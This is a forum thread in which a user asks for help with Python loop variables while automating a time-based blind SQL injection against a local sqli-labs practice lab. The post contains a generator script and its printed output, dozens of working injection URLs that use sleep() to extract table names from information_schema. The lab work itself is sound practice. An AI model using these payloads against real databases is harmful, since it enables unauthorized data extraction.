Python Forum

Python Forum > Python Coding > General Coding Help > how to use 3 variables python loop
Full Version: how to use 3 variables python loop
You're currently viewing a stripped down version of our content. View the full version with proper formatting.

evilcode1

Nov-10-2021, 10:55 PM
hello all ...
im trying to solve a sql challenge on my local machine ... ( https://github.com/Audi-1/sqli-labs)
i try to solve the blind ( time based ) one i write this code to automate the process :
test code : 
target = "http://192.168.1.144/sqli-labs/Less-9/?id=1'"
for q in range(0 , 5):
        for j in range(32 , 50):
           
                    
            dd = f"{target} and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit {q},1),{q+1},1))={j},sleep(5),1) --+"
            print(dd)
Output:
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=32,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=33,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=34,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=35,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=36,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=37,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=38,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=39,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=40,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=41,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=42,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=43,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=44,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=45,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=46,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=47,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=48,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=49,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))=32,sleep(5),1) --+
id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=49,sleep(5),1) --+
id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))=32,sleep(5),1) --+

i need the result in red color to stay 0,1),2,1))=32 how i can do that ?
i need them like this :
[Image: Screenshot-from-2021-11-11-00-58-48.png]

jamesaarr

Nov-12-2021, 11:32 AM
What module are you using to query SQL?

jamesaarr

Nov-12-2021, 11:43 AM
Also which task are you looking at on Github?

I am struggling to understand the outcome you want. Could you rephrase the question or provide an example of the correct output?



Thanks
James
Python Forum > Python Coding > General Coding Help > how to use 3 variables python loop